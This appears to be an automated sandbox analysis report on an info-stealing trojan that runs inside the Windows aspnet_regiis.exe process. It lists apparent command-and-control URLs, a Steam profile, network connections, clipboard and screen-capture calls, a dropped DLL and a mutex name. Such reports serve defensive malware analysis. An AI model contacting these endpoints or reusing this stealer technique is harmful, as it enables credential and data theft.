                Source: aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiapi
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://southedhiscuso.shop:443/api
                Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900d
                Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00429BC0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00429BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00429BC0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00429BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0042A39F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_0042A39F
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDC8810 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6CDC8810
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDC88100_2_6CDC8810
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDC11C00_2_6CDC11C0
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDE28650_2_6CDE2865
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDD69900_2_6CDD6990
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDC7D500_2_6CDC7D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041F0902_2_0041F090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040A0A02_2_0040A0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004140A02_2_004140A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004361202_2_00436120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040F27F2_2_0040F27F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0042EA202_2_0042EA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040CB452_2_0040CB45
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041E3D92_2_0041E3D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041538C2_2_0041538C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040BB912_2_0040BB91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00436B902_2_00436B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00415C492_2_00415C49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041EC002_2_0041EC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040F4032_2_0040F403
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041C4902_2_0041C490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0043354F2_2_0043354F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00420D502_2_00420D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00404E602_2_00404E60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00416EC02_2_00416EC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0042E6E02_2_0042E6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040BE902_2_0040BE90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00422EB02_2_00422EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0042DF702_2_0042DF70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040A7002_2_0040A700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040AF002_2_0040AF00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041B7D02_2_0041B7D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004157D02_2_004157D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041F7D02_2_0041F7D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00432FE02_2_00432FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040CFA02_2_0040CFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040F80B2_2_0040F80B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041B0372_2_0041B037
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004058802_2_00405880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004010B82_2_004010B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041F1782_2_0041F178
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004111992_2_00411199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004019A22_2_004019A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00403A402_2_00403A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004082502_2_00408250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0042034B2_2_0042034B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00411B5D2_2_00411B5D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0042DB002_2_0042DB00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00434B202_2_00434B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040EBC02_2_0040EBC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00406BD02_2_00406BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00409BE02_2_00409BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00422B902_2_00422B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00410B952_2_00410B95
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004364702_2_00436470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00434C302_2_00434C30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004044A02_2_004044A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004065D02_2_004065D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004325802_2_00432580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0042CD862_2_0042CD86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00433DAF2_2_00433DAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004346612_2_00434661
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0040CE302_2_0040CE30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00411B5D2_2_00411B5D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041D6A12_2_0041D6A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00408F502_2_00408F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004347702_2_00434770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0041FF232_2_0041FF23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00434FE02_2_00434FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00406F842_2_00406F84
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_004367A02_2_004367A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 004096B0 appears 104 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 00408D40 appears 40 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 1648
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1693007252.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Armanivenntii_crypted_EASY.exe
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000000.1688480461.0000000000952000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWendy251Michael.pdfP vs Armanivenntii_crypted_EASY.exe
                Source: Armanivenntii_crypted_EASY.exeBinary or memory string: OriginalFilenameWendy251Michael.pdfP vs Armanivenntii_crypted_EASY.exe
                Source: Armanivenntii_crypted_EASY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@11/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00427C9B CoCreateInstance,2_2_00427C9B
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeFile created: C:\Users\user\AppData\Roaming\d3d9x.dllJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeMutant created: \Sessions\1\BaseNamedObjects\donutfatshitlatte
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7408
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\e4ac1b55-2c07-493d-8614-1a5efd9e9291Jump to behavior
                Source: Armanivenntii_crypted_EASY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Armanivenntii_crypted_EASY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Armanivenntii_crypted_EASY.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe "C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe"
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 1648
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
